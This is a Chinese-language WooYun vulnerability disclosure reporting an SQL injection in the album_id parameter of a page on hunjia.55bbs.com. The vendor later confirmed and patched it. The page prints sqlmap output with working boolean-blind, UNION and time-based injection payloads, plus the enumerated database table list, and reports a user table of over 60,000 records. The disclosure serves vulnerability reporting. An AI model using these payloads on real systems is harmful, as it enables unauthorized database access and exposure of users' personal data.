当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115007

漏洞标题:我爱购物网某站存在SQL注入(支持UNION)

相关厂商:55bbs.com

漏洞作者: 深度安全实验室

提交时间:2015-05-19 21:28

修复时间:2015-07-04 14:44

公开时间:2015-07-04 14:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:17

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-19: 细节已通知厂商并且等待厂商处理中
2015-05-20: 厂商已经确认,细节仅向厂商公开
2015-05-30: 细节向核心白帽子及相关领域专家公开
2015-06-09: 细节向普通白帽子公开
2015-06-19: 细节向实习白帽子公开
2015-07-04: 细节向公众公开

简要描述:

详细说明:

http://hunjia.55bbs.com/files/activity/vote.php?album_id=79&t=3

album_id参数~

21.png


1380张表:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: album_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: album_id=79 AND 6188=6188&t=3
Type: UNION query
Title: MySQL UNION query (NULL) - 14 columns
Payload: album_id=-6651 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7174736571,0x6870676d654e4e6f6442,0x7171786971)#&t=3
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: album_id=79 AND SLEEP(5)&t=3
---
web application technology: Apache 2.2.25, PHP 5.3.27
back-end DBMS: MySQL 5.0.11
Database: 55user
[1380 tables]
+-------------------------+
| 2013_topic_LG |
| 55_bao10_3phplog |
| 55_bao10_7_4 |
| 55_bao10_accesslog |
| 55_bao10 |
| 55_vote_0 |
| 55_vote_config |
| 55_vote_index |
| 55_vote |
| active_answer_20121106 |
| active_answer_cate |
| active_answer_user |
| active_tid_pid_relation |
| activity |
| activity_0 |
***************************
这部分被我删掉了
**************************
| activity_999 |
| activity_egg |
| activity_info |
| activity_panting |
| activity_photo_396 |
| activity_photo_399 |
| bride_album |
| bride_photos |
| bride_vote |
| bwxn |
| bwxn_2012 |
| bwxn_2013_error_log |
| bwxn_2013_jiangpin |
| bwxn_2014_prize |
| bwxn_2014_prize_log |
| bwxn_2014_user_pic |
| bwxn_2014_userinfo |
| bwxn_2014_vote |
| bwxn_basenum_2012 |
| bwxn_bbs_score_2012 |
| bwxn_check_code_log |
| bwxn_code |
| bwxn_myshop_2013 |
| bwxn_phone_2013 |
| bwxn_shop_info_2013 |
| bwxn_sms_recode_2013 |
| bwxn_sms_record_2012 |
| bwxn_store_2012 |
| bwxn_store_score_2012 |
| bwxn_temporary_2012 |
| bwxn_unique_code_2013 |
| bwxn_userinfo_2013 |
| bwxn_vote_2012 |
| bwxn_vote_2013 |
| bwxn_win_info_2013 |
| ci_book |
| ci_rights |
| ci_user |
| del_param_log |
| duowei_useinfo |
| duowei_vote |
| eanhk_sn |
| group_data |
| info_param |
| ip_tj |
| jiehun_act |
| log_exceldata_2012 |
| log_exceldata_2013 |
| m_activities |
| m_albums |
| m_ip_logs |
| m_photos |
| mnls_userinfo |
| moto_userinfo |
| moto_vote |
| param_cate |
| param_dict |
| qmshangwang |
| qmshangwang_tids |
| qmshangwang_users |
| recipient |
| s11_2014_code |
| s11_2014_prize |
| s11_2014_prize_log |
| s11_2014_userinfo |
| saiban_photo |
| saiban_userinfo |
| sms_hack_log |
| sms_info |
| sms_params_log |
| sony_data |
| sony_vote |
| sunny_396 |
| sunny_vote |
| tbl_div |
| tbl_module |
| tbl_tid_fid |
| tbl_tongji |
| tbl_tongji_hour |
| user_20101002 |
| user_blacklist |
| userinfo |
| username_data |
| win_info |
| wizard_userinfo |
| wizard_vote |
+-------------------------+

漏洞证明:

userinfo表,6万多条信息

11.png


172个字段,只跑一个来看看吧~

12.png

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-05-20 14:43

厂商回复:

漏洞已补,非常感谢.

最新状态:

暂无